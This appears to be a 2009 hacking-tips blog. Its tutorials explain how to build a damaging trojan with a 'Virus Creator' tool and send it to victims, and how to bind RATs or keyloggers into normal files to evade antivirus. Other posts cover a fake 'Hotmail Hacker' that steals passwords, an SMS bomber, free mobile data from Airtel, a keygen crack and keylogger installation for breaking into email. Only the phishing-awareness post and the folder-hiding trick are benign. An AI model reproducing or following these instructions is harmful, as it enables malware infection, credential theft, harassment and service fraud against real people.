remote pc access software.
Friday, November 27, 2009
PRORAT : Remote PC Access Software
Monday, November 23, 2009
Virus creator to create torjan virus
This virus creator software is easy to use and is used to create virus trojan which harasses user. In this article, I have explained how to create torjan virus
Virus creator to create virus trojan:
1. Download VIRUS CREATOR Software to create virus trojan.
2. Unzip the file using Winzix ( download here) to obtain Virus creator to
create virus
3. Run Virus Creator V.65 on your computer to get something like:
4. Now, Virus creator will ask you for various options listed below:
# name of virus
# Save virus to startup
# Save to homedrive
# Save to system32
# Save to desktop
# Disable scheduled tasks
# Create 10 users
# Corrupt system files
# Open 10 command windows
# Start world's most annoying webpages 10 times
# Reset time to midnight
# Memory leak
These options determine effectiveness of your virus. You can choose options preferences as you like and depending on amount of damage you wish the virus should do to victim.
Now, when you have selected preferences, simply press enter and virus creator software will create virus trojan for you.
5. Now, all you have to do is send this created virus to your victim and ask him to run this virus on his computer(Social Engineering). You can use Binder to make this virus undetectable from antivirus and even prevent doubt of victim.
You will require to have Winzix to download Virus creator software. Free Download Winzix here. Remember to install.
Thus, you now know how to create virus trojan using Virus creator software. Remember to bind this virus with Binder. I have tried to keep this virus creator tutorial simple. If you have any problem in usingvirus creator to create virus,please mention it in comments.
Enjoy Virus creator software to create virus...
Sunday, November 22, 2009
Binder software to disable Antivirus detection
What is Binder???
Binder is a free software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application (in our case - RAT or keylogger), the application is also run when the actual binded file is run.thus Binder is used to bypass antivirus detection.
I have provided link to download binder.
How to use Binder???
1. first of all, you need a binder. So, download free Binder software.
2. Unzip the downloaded file using Winzix (free download here) to obtain Binder setup.
3. Install software on your computer to see:
4. Now, click on "Select File #1" and select the kelloger or RAT you wanna bind to avoid its antivirus detection.
5. Click on "Select File #2" and select the normal file with which you wanna bind our trojan, RAT or Kelogger.
6. Simply, hit on "Bind" to obtain the binded keylogger or trojan file. Now, simply send this file to victim whom this file will appear normal (trojan is hidden due to binding).
7. Remember to check both "Execute"options and you can use "EXE Pump" to increase your file size to desired value.
please post comments
Saturday, November 21, 2009
Use Mobile Phone as a Microphone and Speakers
No one like to use their microphone and speakers when they talk to their family and friend in Yahoo messenger, Msn Messenger, Skype, Google Talks and so many instant messenger software. Now you can make use of you mobile as microphone and speakers to talk with you friends and family believe me it's simple and easy, just follow the step by step guide and you will throw you microphone into bin forever.
You don't have to remain in one place to talk with friends an family, if you have USB bluetooth or WIFI router you can remain anywhere in your home and enjoy talking with your friends and save your cost forever.
Here is the step by step guide to make your mobile phone as microphone.
1. Download the file from This link and read the following steps.
2. In this file you will get one folder (I_LOVE_DVT) and two separate file. One is for PC application and another is for mobile application.
3. Install the PC software name as "mobiolaheadset2_wl_s60v3" in PC and install the mobile application name as "headset_s60_v_2_0" into mobile.
4. Remember if your don't have Blue tooth or WIFI functions, it will not work. Yeah it works for Cable but what is the difference between a cable and normal Microphone.
5. Installed the application in PC as well in mobile now open the folder "I_LOVE_DVT" and in it you will find two files, one is "keymaker" and other is "runme". Copy these two files into the install directory such as "C:\Program Files\Mobiola Headset for S60" and paste it.
6. Now run the "runme" and "keymaker" as well. From "runme" copy the Hardware fingerprint something like "373D-BCC0" into "keymaker's" H/W ID and press generate.
7. Now copy the keys and the name from "keymaker" into "runme" and press ok. It show valid. Now run the PC application and check it.
8. Than go to control Panel, sound and device. Run the sound and devices settings find the microphones one, select your microphone driver to mobiola and select the speaker driver.
9. Check your microphone by going to Volume controls and run any song to check your speakers that you can hear the song in your mobile speaker.
10. Enjoy talking with your friends and family and save your cost.
Friday, November 13, 2009
FOLDER LOCK -NO SOFTWARE
Labels: COMMAND PROMPT HACKING, HOW TO MAINTAIN A COMPUTER, TIPS AND TRICKS
Here is how to do that -
Create a new folder,rename it to a simple name like xero.
Now go to its properties,and choose a sprite less icon,which is next to a Yellow lock icon in third row.Choose it,click OK and now folder will have no icon,literally invisible.Now to make it almost inaccessible,we must use some Batch renaming technique.
Create a new text file in the same drive next to the folder and type thiscommand statement into it-
ren xero xero.{b5946137-7b9f-4925-af80-51abd60b20d5}
Now save this text file as lock.bat. Similarly create another text file and type this command statement into it-
ren xero.{b5946137-7b9f-4925-af80-51abd60b20d5} xero
Save this text file as lock.bat . Lock.bat will be used to make the folder inaccessible and Key.bat will be used to revert it into its original form.
What we have done here,is that we have renamed the folder with a random CLSID,which will change its identity into something else sing DOS. ‘CLSID’ is a unique registry-identifying component that is used to identify anActiveX control or in simple language,it identifies which file/control will be opened by which program in Windows. I have determined the CLSID by opening registry editor and searching for “CLSID” and choosing any random value like {b5946137-7b9f-4925-af80-51abd60b20d5} which I m using here.
Some common CLSID’s are -
- Recycle bin - 645FF040-5081-101B-9F08-00AA002F954E
- Control panel - 21EC2020-3AEA-1069-A2DD-08002B30309D
- Run - 2559A1F3-21D7-11D4-BDAF-00C04F60B9F0
- Search - 2559A1F0-21D7-11D4-BDAF-00C04F60B9F0
- Connect To - 7007ACC7-3202-11D1-AAD2-00805FC1270E
- Briefcase - 85BBD920-42A0-1069-A2E4-08002B30309D
- Help - 2559A1F1-21D7-11D4-BDAF-00C04F60B9F0
- Fonts - D20EA4E1-3957-11d2-A40B-0C5020524152
- Cameras and Scanners - E211B736-43FD-11D1-9EFB-0000F8757FCD
- My Network places - 208D2C60-3AEA-1069-A2D7-08002B30309D
Sorry for a little diversion,but I thought that was necessary. Now you have created the files,just double click the lock.bat file to make the folder inaccessible. Now the folder is invisible and also it cant be accessed by anyone.
But still,it has a name. So,in order to completely hide it, Rename it and enter an ASCII code by pressing ALT+0160 which will enter a null character in place of name and it will have No Name.
Congrats..Now you have created an inaccessible folder. To access it,just rename the folder into its original name and then click on key.bat . Now make sure to place the folder in a secure location and place lock.bat and key.bat in different locations . This simple folder lock is very effective as no one has idea that You can create it (sarcasm..again :P) .
Use some creativity and you can make that folder 100% inaccessible by encrypting it. I gave you a hint,find your own way :)
Hotmail Hacker - Hack Hotmail
Hotmail Hacker - Hack Hotmail password:
1. Free Download Hotmail hacker to hack hotmail password.
2. Download Winzix (free download here) to obtain Hotmail hacker folder.
3. Run, Hotmail hacker builder.exe file to see:
4. Now, enter your email account address, password and also the subject of email you want to receive. This email will contain the password you wanna hack. Also select appropriate smtp serveraddress. You can use smtp server addresses for this. Avoid use of hotmail email account. Can use gmail, yahoo or such. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim whose you wanna hack Hotmail password and tell him that this Hotmail hacker software is used to hack Hotmail password. Convince him that he can hack anyone's hotmail password using this Hotmail hacker. Ask him to run Hotmail Hacker.exe and enter all information (which includes his Hotmail id and password plus Hotmail id of victim he wanna hack).
6. As he enters this information and hits "Login And Start", he will receive error message as shown.
7. And you will receive in your inbox a mail like this:
8. Cheers.... you are able to hack Hotmail password using Hotmail hacker - hotmail cracker software.
You will require to have Winzix to get Hotmail Hacker software. Download Winzix here.
That's it for today. I hope you are now well approached with this way tohack Hotmail password using Hotmail hacker.This way to hack hotmail password using hotmail hacker is 100% working.. personally tested. If you face problems in using Hotmail hacker to hack hotmail password, mention it in comments.
Enjoy Hotmail hacker to hack hotmail password...
Thursday, November 5, 2009
Cell phone SMS bomber
Cell phone SMS bomber:
1. Free Download Cell Phone SMS Bomber free software to hack friend's cell phone.
Password: techotips.blogspot.com
2. Unzip the downloaded file using Winzix (free download here) to obtain free software Cell Phone SMS Bomber.
3. Now, run Cell Phone SMS Bomber.exe file on your computer system to see:
4. Simply select the network provider from dropdown list, then enter victim number and number of times the text message is to be sent. Also, enter the actual text message you wanna bomb to mobile phone. You should have internet connection for cell phone sms bomber to work.
5. Now, simply hit "Bomb Cell phone" and Cell Phone SMS Bomber will start sending (bombing) text messages to victim cell phone... thus, hacking cell phone.
Note: This Cell Phone SMS Bomber is found currently supporting following wireless networks:
# Verizon
# AT&T
# Nextel
# Sprint
# T-Mobile
# Boost Mobile
# Alltel
You will require to have Winzix to get Cell Phone SMS Bomber software. Download Winzix here.
So guys that's all about Cell Phone SMS Bomber - software to hack friend's cell phone. Lemme know your feedback about this Cell Phone SMS Bomber tohack your friend's cell phoneby sending him unlimited number of text messages. If you have any problem in using this Cell Phone SMS Bomber to hack your friend's cell phone, please mention it in comments.
Enjoy Cell Phone SMS Bomber...
HACK AIRTEL GPRS
Air tel free GPRS hack:
1. Download HERE Airtel free GPRS browser to hack airtel GPRS.
2. Unzip this file using Winzix (free download here) to obtain Airtel free GPRS software.
3. Now, install this browser in your mobile. This Airtel free GPRS browser is same as Opera Mini browser, but this browser is modified to use proxy server to get Airtel free GPRS.
4. After installation, press Accept and OK sequentially and get Mobile Officesettings from Airtel. Start airtel free GPRS browser using Mobile Office as Internet access profile and you will start using Airtel free GPRS. Thus, we are able to hack Airtel to get free Airtel GPRS.
Note: In some cases, you're charged 30 paise after exiting from browser. You can surf as many sites as you can and then after exiting, you'll be charged only 30 paise for that session. So, if you don't wanna lose any money, simple logic is to not to exit from Airtel free GPRS browser. Just keep it minimized and running in background.
Also, you can avoid 30 paise cutting by maintaining balance below 30 paise.
You will require to have Winzix to get Airtel free GPRS Browser software. Download Winzix here.
So friends, this Airtel hack to get free Airtel gprs will surely work for you. I havepersonally tried this out in Maharashtra and found it working to get Airtel free gprs. If you find this working, please mention "Your State" in comments so that other Airtel subscribers of your state may also be benefitted. If you have any problem in using this trick tohack Airtel for Airtel free gprs,please mention it in comments.
Enjoy n hack Airtel for Airtel free GPRS...
Tuesday, November 3, 2009
What is Phishing ?
Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.
Recent phishing attempts have targeted the customers of banks and online payment services. Social networking sites such as Orkut are also a target of phishing.
Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack. In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.
TECHNIQUES BEHIND PHISHING ATTACK
1.Link Manipulation
instead of http://www.microsoft.com/
2.Filter Evasion
Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails. This is the reason Gmail or Yahoo will disable the images by default for incoming mails.
How does a phishing attack/scam look like?
As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows. They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites. Here is an example of how the phishing scam email looks like
These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.
How to identify a fraudulent e-mail?
Here are a few phrases to look for if you think an e-mail message is a phishing scam.
“Verify your account.”
Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.
“If you don’t respond within 48 hours, your account will be closed.”
These messages convey a sense of urgency so that you’ll respond immediately without thinking.
“Dear Valued Customer.”
“Click the link below to gain access to your account.”
Change IP Address
1. Click on “Start” in the bottom left hand corner of screen.
2. Click on “Run”.
3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”.
5. Type “exit” and leave the prompt.
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.
8. Right click on “Local Area Connection” and click “properties”.
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.
10. Click on “Use the following IP address” under the “General” tab.
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here.
14. Hit the “Ok” button again.You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings.
17. This time, select “Obtain an IP address automatically”.
18. Hit “Ok”.
19. Hit “Ok” again.
20. You now have a new IP address.
Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack.In this case you need to switch off the modem and then switch it on to get the new IP address.
NOTE: All these tricks works only if you have a dynamic IP address.But if you have a static IP address you have no option to change your IP.
How to Hack an Email using Hardware Keylogger
Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.
How to Hack an Email Account
How to Hack an Email
Everyday I get a lot of emails wherein my readers ask me How to Hack an Email? You as the reader are most likely reading this because you want to hack into someone’s email. So in this post I have decided to uncover the real and working ways to hack any email.
Can Emails Be Hacked?
Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.
1. There is no ready made software that can hack emails just with a click of a button. So if you come accross a site selling “Email Hacking software” plz don’t trust it.
2. Never trust any email hacking service that claims to hack any email just for $100 or $200. All of the email hacking services are scam.
3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other email hacking methods are simply scam or don’t work. The following are the only 2 working and foolproof methods for email hacking.
1. EASIEST WAY TO HACK AN EMAIL
The easiest way to hack an email is by using a keylogger. A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keyloggers as the best for hacking email.SniperSpy
Win-Spy
I don’t have physical access to the target computer, can I still use sniperspy?
Yes you can still use it for hacking email. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC. However they can also work on a local computer.
What if the antivirus block from sending it as an email attachment?
Instead of sending the keylogger as an email attachment, you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.
SniperSpy Homepage
2. OTHER WAYS TO HACK AN EMAIL
The other most commonly used trick for hacking email is by using Fake Login Pages. Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we lose our valuable data. However creating a fake login page and taking it online to successfully hack an email is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So I recommend the usage of keyloggers for hacking email since it’s the easiest one.I hope this info has helped you. Happy Email Hacking!
Update:- you can download sniper spy to hack remote computers from here